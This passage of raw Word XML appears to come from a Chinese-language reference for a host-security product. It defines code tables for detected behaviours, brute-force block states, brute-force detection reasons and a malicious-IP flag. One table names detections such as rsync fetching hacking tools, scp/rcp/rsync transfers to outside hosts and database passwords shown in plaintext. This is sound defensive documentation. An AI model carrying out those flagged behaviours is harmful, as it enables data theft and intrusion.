            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="013CDC9B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16E7EA45" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rsync</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>下载黑客工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0ED4FB94" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C21FC24" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2ED2AD52" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="634FFE20" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>MYSQL明文密码显示</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4A5A4C2F" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BC40A1A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AC436CD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64772884" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Mongo明文密码显示</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="240340CD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05298710" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="252F1814" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1ABB71A3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>scp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>外部下载或上传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0F255A4D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BD9AFFF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="594193F7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43D64BC3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>外部下载或上传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="58A9BF30" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2705E303" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27E2B5EB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F69CB51" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rsync</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>外部下载或上传</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5AA7449B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03186956" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A8DB400" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="093F40D8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>赋给目录或文件危险权限</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5DFFD99B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="585" w:name="_Toc115166365"/>
      <w:bookmarkStart w:id="586" w:name="暴力破解封停状态"/>
      <w:bookmarkEnd w:id="584"/>
      <w:r>
        <w:t>暴力破解封停状态</w:t>
      </w:r>
      <w:bookmarkEnd w:id="585"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="727"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="77D204C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B4BED58" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6ADD213B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4050D396" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3F2BB296" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F0DED41" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6453C1D5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C4005CE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>未处理</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="21BBF79D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A6EFCFC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EEC16E1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22368C95" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>自动封停</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="75ED1CC2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43170073" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64792161" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16026BC5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>自动解封</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6A4CC6D0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24754786" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42459BB3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0372E877" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>手动封停</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4F3478C2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E741280" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65F6726B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A905C5F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>手动解封</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="027940F2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B0998EC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A3C6589" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A0FFD67" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>解封中</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="185607BC" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00BD464E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="783ECF43" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CA245A2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>封停中</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5379F890" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37736D65" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62389B13" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30A20A82" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>封停失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="607FADF4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09419644" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="342E5C09" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>-2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="718D9AFC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>解封失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D4165F3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="587" w:name="_Toc115166366"/>
      <w:bookmarkStart w:id="588" w:name="暴力破解判定为爆破的原因类型）"/>
      <w:bookmarkEnd w:id="586"/>
      <w:r>
        <w:t>暴力破解判定为爆破的原因（类型）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="587"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="873"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="3244"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="62A8C0B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70F0DBDD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="632F9D27" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34ACC25A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4F21EA6E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EF664BA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>reason</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D832683" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B693BA5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>相同IP下同</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>一</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>用户名登录多次</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7D05A10D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="632B4E5B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>reason</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F69F571" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EF9B79B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>相同IP下多个不存在的用户名登录</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1B3E9236" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C0077B7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>reason</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18FD9B66" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="543F4B74" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>指定时间内重试达到指定次数</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4A7BD8C4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="589" w:name="_Toc115166367"/>
      <w:bookmarkStart w:id="590" w:name="是否恶意ip库"/>
      <w:bookmarkEnd w:id="588"/>
      <w:r>
        <w:t>是否恶意IP库</w:t>
      </w:r>
      <w:bookmarkEnd w:id="589"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="997"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="75F3285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C37A50F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4DC3D95C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D767F01" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="571E6EA7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C60AAA4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>evilIpDb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="737F1F3B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EDE097A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="67687745" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4587D4B5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>evilIpDb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
